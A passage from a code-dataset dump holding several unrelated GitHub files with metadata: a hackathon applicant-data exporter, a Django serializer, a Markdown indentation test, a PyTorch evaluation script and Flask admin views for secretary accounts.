"file_size_in_byte": 359, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "music_genre_classification.models.classification_model.TorchMertClassIncrementalModel", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 9, "usage_type": "attribute"}]} +{"seq_id": "19629383239", "text": "from sqlalchemy import Integer, cast, extract, func\nfrom sqlalchemy.future import select\n\nfrom common.database import Application, ApplicationStatus, Participant, School\n\nfrom .base import Exporter\n\n\nclass MLHRegistered(Exporter):\n header = [\n \"First name\",\n \"Last name\",\n \"Age\",\n \"Email\",\n \"School\",\n \"Phone number\",\n \"Country\",\n \"Level of study\",\n \"Acknowledged checkboxes\",\n ]\n statement = (\n select(\n Participant.first_name,\n Participant.last_name,\n cast(extract(\"year\", func.age(Application.date_of_birth)), Integer),\n Participant.email,\n School.name,\n Application.phone_number,\n Application.country,\n Application.level_of_study,\n Application.legal_agreements_acknowledged,\n )\n .join_from(Application, Participant)\n .join_from(Application, School)\n )\n\n\nclass ResumeBook(Exporter):\n header = [\n \"First name\",\n \"Last name\",\n \"Email\",\n \"Age\",\n \"Country\",\n \"School\",\n \"Major\",\n \"Level of study\",\n \"Graduation year\",\n \"Portfolio URL\",\n \"VCS URL\",\n \"Has 
Resume?\",\n ]\n statement = (\n select(\n Participant.first_name,\n Participant.last_name,\n Participant.email,\n cast(extract(\"year\", func.age(Application.date_of_birth)), Integer),\n Application.country,\n School.name,\n Application.major,\n Application.level_of_study,\n Application.graduation_year,\n Application.portfolio_url,\n Application.vcs_url,\n Application.resume != None,\n )\n .join_from(Application, Participant)\n .join_from(Application, School)\n .where(Application.status == ApplicationStatus.ACCEPTED)\n .where(Application.share_information)\n )\n\n\nclass All(Exporter):\n header = [\n \"First name\",\n \"Last name\",\n \"Email\",\n \"Phone Number\",\n \"Age\",\n \"Gender\",\n \"Race / Ethnicity\",\n \"Country\",\n \"School\",\n \"Major\",\n \"Level of Study\",\n \"Graduation Year\",\n \"Hackathons Attended\",\n \"Portfolio URL\",\n \"VCS URL\",\n \"Share Information?\",\n \"Checked-in?\",\n \"Status\",\n ]\n statement = (\n select(\n Participant.first_name,\n Participant.last_name,\n Participant.email,\n Application.phone_number,\n cast(extract(\"year\", func.age(Application.date_of_birth)), Integer),\n Application.gender,\n Application.race_ethnicity,\n Application.country,\n School.name,\n Application.major,\n Application.level_of_study,\n Application.graduation_year,\n Application.hackathons_attended,\n Application.portfolio_url,\n Application.vcs_url,\n Application.share_information,\n Participant.checked_in,\n Application.status,\n )\n .join_from(Application, Participant)\n .join_from(Application, School)\n )\n", "repo_name": "WaffleHacks/application-portal", "sub_path": "tasks/handlers/integration/export/applications.py", "file_name": "applications.py", "file_ext": "py", "file_size_in_byte": 3237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.Exporter", "line_number": 9, "usage_type": "name"}, {"api_name": "common.database.Application", "line_number": 34, "usage_type": "argument"}, {"api_name": "common.database.School", "line_number": 34, "usage_type": "argument"}, {"api_name": "common.database.Application", "line_number": 33, "usage_type": "argument"}, {"api_name": "common.database.Participant", "line_number": 33, "usage_type": "argument"}, {"api_name": "sqlalchemy.future.select", "line_number": 22, "usage_type": "call"}, {"api_name": "common.database.Participant.first_name", "line_number": 23, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 23, "usage_type": "name"}, {"api_name": "common.database.Participant.last_name", "line_number": 24, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 24, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 25, "usage_type": "argument"}, {"api_name": "sqlalchemy.extract", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.func.age", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 25, "usage_type": "name"}, {"api_name": "common.database.Application.date_of_birth", "line_number": 25, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 25, "usage_type": "name"}, {"api_name": "common.database.Participant.email", "line_number": 26, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 26, "usage_type": "name"}, {"api_name": "common.database.School.name", 
"line_number": 27, "usage_type": "attribute"}, {"api_name": "common.database.School", "line_number": 27, "usage_type": "name"}, {"api_name": "common.database.Application.phone_number", "line_number": 28, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 28, "usage_type": "name"}, {"api_name": "common.database.Application.country", "line_number": 29, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 29, "usage_type": "name"}, {"api_name": "common.database.Application.level_of_study", "line_number": 30, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 30, "usage_type": "name"}, {"api_name": "common.database.Application.legal_agreements_acknowledged", "line_number": 31, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 31, "usage_type": "name"}, {"api_name": "base.Exporter", "line_number": 38, "usage_type": "name"}, {"api_name": "common.database.Application", "line_number": 69, "usage_type": "argument"}, {"api_name": "common.database.School", "line_number": 69, "usage_type": "argument"}, {"api_name": "common.database.Application", "line_number": 68, "usage_type": "argument"}, {"api_name": "common.database.Participant", "line_number": 68, "usage_type": "argument"}, {"api_name": "sqlalchemy.future.select", "line_number": 54, "usage_type": "call"}, {"api_name": "common.database.Participant.first_name", "line_number": 55, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 55, "usage_type": "name"}, {"api_name": "common.database.Participant.last_name", "line_number": 56, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 56, "usage_type": "name"}, {"api_name": "common.database.Participant.email", "line_number": 57, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 57, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 58, "usage_type": "argument"}, {"api_name": "sqlalchemy.extract", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.func.age", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 58, "usage_type": "name"}, {"api_name": "common.database.Application.date_of_birth", "line_number": 58, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 58, "usage_type": "name"}, {"api_name": "common.database.Application.country", "line_number": 59, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 59, "usage_type": "name"}, {"api_name": "common.database.School.name", "line_number": 60, "usage_type": "attribute"}, {"api_name": "common.database.School", "line_number": 60, "usage_type": "name"}, {"api_name": "common.database.Application.major", "line_number": 61, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 61, "usage_type": "name"}, {"api_name": "common.database.Application.level_of_study", "line_number": 62, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 62, "usage_type": "name"}, {"api_name": "common.database.Application.graduation_year", "line_number": 63, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 63, "usage_type": "name"}, {"api_name": "common.database.Application.portfolio_url", "line_number": 64, 
"usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 64, "usage_type": "name"}, {"api_name": "common.database.Application.vcs_url", "line_number": 65, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 65, "usage_type": "name"}, {"api_name": "common.database.Application.resume", "line_number": 66, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 66, "usage_type": "name"}, {"api_name": "common.database.Application.status", "line_number": 70, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 70, "usage_type": "name"}, {"api_name": "common.database.ApplicationStatus.ACCEPTED", "line_number": 70, "usage_type": "attribute"}, {"api_name": "common.database.ApplicationStatus", "line_number": 70, "usage_type": "name"}, {"api_name": "common.database.Application.share_information", "line_number": 71, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 71, "usage_type": "name"}, {"api_name": "base.Exporter", "line_number": 75, "usage_type": "name"}, {"api_name": "common.database.Application", "line_number": 118, "usage_type": "argument"}, {"api_name": "common.database.School", "line_number": 118, "usage_type": "argument"}, {"api_name": "common.database.Application", "line_number": 117, "usage_type": "argument"}, {"api_name": "common.database.Participant", "line_number": 117, "usage_type": "argument"}, {"api_name": "sqlalchemy.future.select", "line_number": 97, "usage_type": "call"}, {"api_name": "common.database.Participant.first_name", "line_number": 98, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 98, "usage_type": "name"}, {"api_name": "common.database.Participant.last_name", "line_number": 99, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 99, "usage_type": "name"}, {"api_name": "common.database.Participant.email", "line_number": 100, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 100, "usage_type": "name"}, {"api_name": "common.database.Application.phone_number", "line_number": 101, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 101, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 102, "usage_type": "argument"}, {"api_name": "sqlalchemy.extract", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.func.age", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 102, "usage_type": "name"}, {"api_name": "common.database.Application.date_of_birth", "line_number": 102, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 102, "usage_type": "name"}, {"api_name": "common.database.Application.gender", "line_number": 103, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 103, "usage_type": "name"}, {"api_name": "common.database.Application.race_ethnicity", "line_number": 104, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 104, "usage_type": "name"}, {"api_name": "common.database.Application.country", "line_number": 105, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 105, "usage_type": "name"}, {"api_name": "common.database.School.name", "line_number": 106, "usage_type": 
"attribute"}, {"api_name": "common.database.School", "line_number": 106, "usage_type": "name"}, {"api_name": "common.database.Application.major", "line_number": 107, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 107, "usage_type": "name"}, {"api_name": "common.database.Application.level_of_study", "line_number": 108, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 108, "usage_type": "name"}, {"api_name": "common.database.Application.graduation_year", "line_number": 109, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 109, "usage_type": "name"}, {"api_name": "common.database.Application.hackathons_attended", "line_number": 110, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 110, "usage_type": "name"}, {"api_name": "common.database.Application.portfolio_url", "line_number": 111, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 111, "usage_type": "name"}, {"api_name": "common.database.Application.vcs_url", "line_number": 112, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 112, "usage_type": "name"}, {"api_name": "common.database.Application.share_information", "line_number": 113, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 113, "usage_type": "name"}, {"api_name": "common.database.Participant.checked_in", "line_number": 114, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 114, "usage_type": "name"}, {"api_name": "common.database.Application.status", "line_number": 115, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 115, "usage_type": "name"}]} +{"seq_id": "75041765927", "text": "from rest_framework import serializers\r\nfrom nt_resource.models import CatNormalResource\r\nfrom nt_core.utils import get_current_timestamp\r\n\r\n\r\nclass CatNormalResourceListSerializer(serializers.ModelSerializer):\r\n class Meta:\r\n model = CatNormalResource\r\n fields = '__all__'\r\n\r\n def update(self, instance, validated_data):\r\n instance.appid = validated_data.get('appid', instance.appid)\r\n instance.response_time = validated_data.get(\r\n 'response_time', instance.response_time\r\n )\r\n\r\n instance.update_time = get_current_timestamp()\r\n instance.save()\r\n return instance\r\n", "repo_name": "harvardfly/network_anomaly_detection", "sub_path": "nt_resource/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 639, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 45, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 6, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 6, "usage_type": "name"}, {"api_name": "nt_resource.models.CatNormalResource", "line_number": 8, "usage_type": "name"}, {"api_name": "nt_core.utils.get_current_timestamp", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "44294345628", "text": "\"\"\"\nTest suite to check if the indentation of the .md is mostly correct.\n\"\"\"\nimport glob\nimport os\nimport unittest\n\nimport mkdocs.utils.meta\n\nfrom tests.path_constants import DOCS_DIR\n\n\nclass IndentationTest(unittest.TestCase):\n \"\"\"\n Indentation TestCase Class\n \"\"\"\n\n admonition_prefixes = (\"!!!\", \"???\", \"===\")\n list_prefixes = (\"-\", \"+\", 
\"*\")\n codeblock_prefix = \"```\"\n\n def test_admonitions_and_lists(self) -> None:\n \"\"\"\n Test that the indentation of admonitions and lists is correct\n \"\"\"\n paths = glob.glob(\"**/*.md\", root_dir=DOCS_DIR, recursive=True)\n for path in paths:\n file_path = os.path.join(DOCS_DIR, path)\n\n with open(file_path, encoding=\"utf-8-sig\") as file:\n source = file.read()\n\n contents, meta = mkdocs.utils.meta.get_data(source)\n\n last_line = \"\"\n inside_admonition = False\n admonition_valid = False\n inside_codeblock = False\n inside_list = False\n\n for n, line in enumerate(contents.split(\"\\n\"), start=1):\n if inside_admonition and admonition_valid:\n if line.lstrip(\" \") == line:\n inside_admonition = False\n\n if inside_admonition and line.strip():\n self.assertTrue(\n len(line) - len(line.lstrip(\" \")) >= 4,\n f\"The admonition content has to start with 4 or more spaces\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: {line}\",\n )\n admonition_valid = True\n\n if line.startswith(self.admonition_prefixes):\n inside_admonition = True\n admonition_valid = False\n\n if line.startswith(self.codeblock_prefix):\n inside_codeblock = not inside_codeblock\n\n if line.strip() == \"\":\n inside_list = False\n\n # TODO rewrite it someday with regex\n if line.startswith(self.list_prefixes) and not inside_codeblock:\n self.assertTrue(\n len(line) >= 2,\n \"List entries must have content\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: {line}\",\n )\n if line[1] == \" \":\n self.assertTrue(\n last_line.strip() == \"\"\n or last_line.strip().startswith(self.list_prefixes)\n or last_line.strip().startswith(\"#\")\n or inside_list,\n \"Lists need to have an empty line before them\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: {line}\",\n )\n inside_list = True\n\n self.assertTrue(\n line[1] == \" \" or (line[0] == \"*\" and line.count(\"*\") % 2 == 0),\n \"List markers need to be separated by a space\\n\"\n f\"File: {file_path}\\n\"\n f\"Line:{n}: '{line}'\",\n )\n\n last_line = line\n\n self.assertTrue(\n not inside_codeblock, f\"File: {file_path} ended without closing a codeblock\"\n )\n\n print(f\"✅Tested {len(paths)} paths\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "repo_name": "Gothic-Modding-Community/gmc", "sub_path": "tests/test_indentation.py", "file_name": "test_indentation.py", "file_ext": "py", "file_size_in_byte": 3544, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 13, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 26, "usage_type": "call"}, {"api_name": "tests.path_constants.DOCS_DIR", "line_number": 26, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "tests.path_constants.DOCS_DIR", "line_number": 28, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "mkdocs.utils.meta.utils.meta.get_data", "line_number": 33, "usage_type": "call"}, {"api_name": "mkdocs.utils.meta.utils", "line_number": 33, "usage_type": "attribute"}, {"api_name": "mkdocs.utils.meta", "line_number": 33, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "70200420650", "text": "import os\nimport torch\nimport logging\nimport pdb\n\nfrom torch import nn, optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom config.opts import Config\nfrom 
model.model import *\nfrom model.model_attn import *\nfrom utils.loader import *\nfrom utils.utils import *\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\ndef write_(labels):\n\twith open('data/test.txt', 'r') as f:\n\t\tlines = f.readlines()\n\twith open('data/test_.txt', 'a') as f:\n\t\tf.write('\\t'.join(['id', 'turn1', 'turn2', 'turn3', 'label'])+'\\n')\n\t\tfor i, line in enumerate(lines[1:]):\n\t\t\tline_new = line.strip() + '\\t' + labels[i] + '\\n'\n\t\t\tf.write(line_new)\n\t\n\ndef test_sep(**kwargs):\n\tinput_ = kwargs['input']\n\tmodel = kwargs['model'].to(device)\n\tlmap = kwargs['lmap']\n\tilmap = {v:k for k,v in lmap.items()}\n\n\t# pdb.set_trace()\n\teval_object = Eval(lmap)\n\ttest_data_loader = DataLoader(dataset=input_,\n\t\t\t\t\t\t\t\tbatch_size=32)\n\tresults = []\n\tfor i, batch in enumerate(tqdm(test_data_loader)):\n\t\tinput_feature = [batch['input'][i].to(device) for i in range(len(batch['input']))]\n\t\toutput = model(input_feature)\n\t\tprediction = output.contiguous()\n\t\tprediction = eval_object.decode(prediction)\n\t\tprediction = prediction.cpu().numpy().tolist()\n\t\tresults.extend([ilmap[prediction[i]] for i in range(len(prediction))])\n\twrite_(results)\n\ndef test(**kwargs):\n\tinput_ = kwargs['input']\n\tmodel = kwargs['model']\n\tlmap = kwargs['lmap']\n\teval_object = Eval(lmap)\n\tresults = []\n\tilmap = {v:k for k,v in lmap.items()}\n\tfor idx in trange(len(input_)):\n\n\t\tsequence = torch.from_numpy(input_[idx]['feature']).to(device)\n\t\ttext = input_[idx]['input']\n\t\t# sequence = sequence.permute(1, 0)\n\t\tsequence = torch.unsqueeze(sequence, 0)\n\t\toutput = model(sequence)\n\t\tprediction = output.contiguous()\n\t\t# pdb.set_trace()\n\t\tprediction = eval_object.decode(prediction)\n\n\t\tresults.append(ilmap[prediction.cpu().numpy()[0]])\n\twrite_(results)\n\ndef test_batch(**kwargs):\n\tinput_ = kwargs['input']\n\tmodel = kwargs['model'].to(device)\n\tlmap = kwargs['lamp']\n\tilmap = {v:k for k,v in lmap.items()}\n\t# pdb.set_trace()\n\teval_object = Eval(lmap)\n\ttest_data_loader = DataLoader(dataset=input_,\n\t\t\t\t\t\t\t\tbatch_size=32)\n\tresults = []\n\tfor iteration, batch in enumerate(tqdm(test_data_loader)):\n\t\tinput_feature = batch['feature'].to(device)\n\t\tpdb.set_trace()\n\t\toutput = model(input_feature)\n\t\tprediction = output.contiguous()\n\t\tprediction = eval_object.decode(prediction)\n\t\tresults.extend(ilmap[prediction.cpu().numpy()[0]])\n\twrite_(results)\n\ndef main(**kwargs):\n\topt = Config()\n\topt._parse(kwargs)\n\tpath = opt.path\n\tlmap = opt.lmap\n\tvector_size = '%dd'%opt.inp\n\tdatasets = {} \n\t# datasets['test'] = TweetData_V02(path,'test',lmap, vector_size=vector_size)\n\t\n\tnIn = opt.inp\n\tdatasets = TweetData_V02('data/test.txt', lmap, nIn)\n\tnHidden = opt.hidden\t\n\tnClasses = opt.out\n\tdepth = opt.depth\n\tfilters = opt.filters\n\tseqlen = 156\n\t# model = RCNN_Text(nIn, nHidden).to(device)\n\t# model = Turnip(nIn, nHidden, nClasses, depth).to(device)\n\t# model = RCNN(nIn, nHidden, nClasses, seqlen, filters).cuda()\n\tmodel = RNN_attn(nIn, nHidden, nClasses, depth).to(device)\n\tsave_dir = opt.save_dir\n\t# gmkdir(save_dir)\n\tsave_file = opt.save_file\n\tsavepath = save_dir + '/' + save_file\n\tcheckpoint = torch.load(savepath)\n\tmodel.load_state_dict(checkpoint['state_dict'])\n\ttest_sep(input=datasets,\n\t\tmodel=model,\n\t\tlmap=lmap)\n\nif __name__ == '__main__':\n\timport fire\n\tfire.Fire(main)\n", "repo_name": "Deepayan137/EmoContext", "sub_path": 
"evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 3435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.device", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "model.model", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 34, "usage_type": "call"}, {"api_name": "model.model", "line_number": 39, "usage_type": "call"}, {"api_name": "model.model", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.unsqueeze", "line_number": 58, "usage_type": "call"}, {"api_name": "model.model", "line_number": 59, "usage_type": "call"}, {"api_name": "model.model", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 74, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 79, "usage_type": "call"}, {"api_name": "model.model", "line_number": 80, "usage_type": "call"}, {"api_name": "config.opts.Config", "line_number": 87, "usage_type": "call"}, {"api_name": "model.model", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 110, "usage_type": "call"}, {"api_name": "model.model.load_state_dict", "line_number": 111, "usage_type": "call"}, {"api_name": "model.model", "line_number": 111, "usage_type": "name"}, {"api_name": "model.model", "line_number": 113, "usage_type": "name"}, {"api_name": "fire.Fire", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "12441493421", "text": "from flask.json import jsonify\nfrom app.auth.models import Role, User\nfrom prime_admin.forms import PartnerForm, SecretaryEditForm, SecretaryForm, StudentForm, TeacherForm, TrainingCenterEditForm, TrainingCenterForm\nfrom flask_login import login_required, current_user\nfrom app.admin.templating import admin_render_template, admin_table, admin_edit\nfrom prime_admin import bp_lms\nfrom prime_admin.models import Branch, Secretary\nfrom flask import redirect, url_for, request, current_app, flash\nfrom app import mongo\nfrom datetime import datetime\nfrom config import TIMEZONE\nfrom prime_admin.globals import SECRETARYREFERENCE\n\n\n\n@bp_lms.route('/secretaries')\n@login_required\ndef secretaries():\n return admin_render_template(\n Secretary,\n 'lms/secretaries.html',\n 'learning_management',\n title=\"Secretaries\"\n )\n \n # form = SecretaryForm()\n # _table_data = []\n # secretary_role = Role.objects(name=\"Secretary\").first()\n # _secretaries = User.objects(role=secretary_role)\n # for secretary in _secretaries:\n # _table_data.append((\n # secretary.id,\n # secretary.fname,\n # secretary.lname,\n # secretary.branch.name if secretary.branch is not None else '',\n # secretary.created_by,\n # secretary.created_at_local,\n # secretary.updated_by,\n # secretary.updated_at_local\n # ))\n\n # return admin_table(\n # Secretary,\n # fields=[],\n # form=form,\n # table_data=_table_data,\n # create_button=None,\n # create_url=None,\n # create_modal=False,\n # # create_url='lms.create_secretary',\n # edit_url='lms.edit_secretary',\n # view_modal_url='/learning-management/get-view-secretary-data'\n # )\n\n\n@bp_lms.route('/secretaries/dt', methods=['GET'])\ndef fetch_secretaries_dt():\n draw = request.args.get('draw')\n start, 
length = int(request.args.get('start')), int(request.args.get('length'))\n search_value = request.args.get(\"search[value]\")\n\n total_records: int\n filtered_records: int\n\n if search_value != '':\n query = list(mongo.db.auth_users.aggregate([\n {\"$match\": {'lname': {'$regex': search_value}, 'role': SECRETARYREFERENCE}},\n {\"$lookup\": {\n 'from': 'lms_branches',\n 'localField': 'branch',\n 'foreignField': '_id',\n 'as': 'branch'\n }\n }]))\n total_records = len(query)\n else:\n query = list(mongo.db.auth_users.aggregate([\n {\"$match\": {'role': SECRETARYREFERENCE}},\n {\"$lookup\": {\n 'from': 'lms_branches',\n 'localField': 'branch',\n 'foreignField': '_id',\n 'as': 'branch'\n }\n },\n {\"$skip\": start},\n {\"$limit\": length},\n ]))\n total_records = mongo.db.auth_users.find({'role': SECRETARYREFERENCE}).count()\n\n filtered_records = len(query)\n \n table_data = []\n \n for data in query:\n lname = data.get('lname', '')\n fname = data.get('fname', '')\n branch = data.get('branch', [{'name': ''}])[0]\n created_by = data.get('created_by', '')\n created_at = data.get('created_at', '')\n updated_by = data.get('updated_by', '')\n updated_at = data.get('updated_at', '')\n \n table_data.append([\n str(),\n lname,\n fname,\n branch['name'],\n created_by,\n created_at,\n updated_by,\n updated_at,\n ])\n\n response = {\n 'draw': draw,\n 'recordsTotal': filtered_records,\n 'recordsFiltered': total_records,\n 'data': table_data,\n }\n\n return jsonify(response)\n\n\n@bp_lms.route('/get-view-secretary-data', methods=['GET'])\n@login_required\ndef get_view_user_data():\n _column, _id = request.args.get('column'), request.args.get('id')\n\n _data = User.objects(id=_id).values_list(_column)\n\n response = jsonify(result=str(_data[0]),column=_column)\n\n if _column == \"branch\" and _data[0] is not None:\n response = jsonify(result=str(_data[0].id),column=_column)\n\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.status_code = 200\n return response\n\n\n@bp_lms.route('/secretaries/create',methods=['GET','POST'])\n@login_required\ndef create_secretary():\n form = SecretaryForm()\n\n if not form.validate_on_submit():\n for key, value in form.errors.items():\n flash(str(key) + str(value), 'error')\n return redirect(url_for('lms.secretaries'))\n\n try:\n secretary = User()\n\n secretary.fname = form.fname.data\n secretary.lname = form.lname.data\n secretary.branch = Branch.objects.get(id=form.branch.data)\n secretary.role = Role.objects(name=\"Secretary\").first()\n secretary.username = form.username.data\n secretary.email = form.email.data if form.email.data != '' else None\n secretary.set_password(\"password\")\n secretary.is_superuser = False\n\n secretary.created_by = \"{} {}\".format(current_user.fname,current_user.lname)\n\n secretary.save()\n\n flash('New Secretary Added Successfully!','success')\n\n except Exception as e:\n flash(str(e),'error')\n \n return redirect(url_for('lms.secretaries'))\n\n\n@bp_lms.route('/secretaries//edit', methods=['GET', 'POST'])\n@login_required\ndef edit_secretary(oid):\n secretary = User.objects.get_or_404(id=oid)\n form = SecretaryEditForm(obj=secretary)\n\n if request.method == \"GET\":\n\n return admin_edit(\n Secretary,\n form,\n 'lms.edit_secretary',\n oid,\n 'lms.secretaries',\n )\n \n if not form.validate_on_submit():\n for key, value in form.errors.items():\n flash(str(key) + str(value), 'error')\n return redirect(url_for('lms.secretaries'))\n \n try:\n secretary.fname = form.fname.data\n secretary.lname = form.lname.data\n 
secretary.branch = Branch.objects.get(id=form.branch.data)\n secretary.role = Role.objects(name=\"Secretary\").first()\n secretary.username = form.username.data\n secretary.email = form.email.data if form.email.data != '' else None\n secretary.set_updated_at()\n secretary.updated_by = \"{} {}\".format(current_user.fname,current_user.lname)\n \n secretary.save()\n flash('Secretary Updated Successfully!','success')\n\n except Exception as e:\n flash(str(e),'error')\n\n return redirect(url_for('lms.secretaries'))\n", "repo_name": "likes-team/prime-web-admin", "sub_path": "prime_admin/views/secretary.py", "file_name": "secretary.py", "file_ext": "py", "file_size_in_byte": 6702, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "app.admin.templating.admin_render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "prime_admin.models.Secretary", "line_number": 20, "usage_type": "argument"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 16, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 16, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "app.mongo.db.auth_users.aggregate", "line_number": 66, "usage_type": "call"}, {"api_name": "app.mongo.db", "line_number": 66, "usage_type": "attribute"}, {"api_name": "app.mongo", "line_number": 66, "usage_type": "name"}, {"api_name": "prime_admin.globals.SECRETARYREFERENCE", "line_number": 67, "usage_type": "name"}, {"api_name": "app.mongo.db.auth_users.aggregate", "line_number": 77, "usage_type": "call"}, {"api_name": "app.mongo.db", "line_number": 77, "usage_type": "attribute"}, {"api_name": "app.mongo", "line_number": 77, "usage_type": "name"}, {"api_name": "prime_admin.globals.SECRETARYREFERENCE", "line_number": 78, "usage_type": "name"}, {"api_name": "app.mongo.db.auth_users.find", "line_number": 89, "usage_type": "call"}, {"api_name": "app.mongo.db", "line_number": 89, "usage_type": "attribute"}, {"api_name": "app.mongo", "line_number": 89, "usage_type": "name"}, {"api_name": "prime_admin.globals.SECRETARYREFERENCE", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.json.jsonify", "line_number": 122, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms.route", "line_number": 56, "usage_type": "call"}, {"api_name": "prime_admin.bp_lms", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 128, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 128, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 128, "usage_type": "name"}, {"api_name": "app.auth.models.User.objects", "line_number": 130, "usage_type": "call"}, {"api_name": "app.auth.models.User", "line_number": 
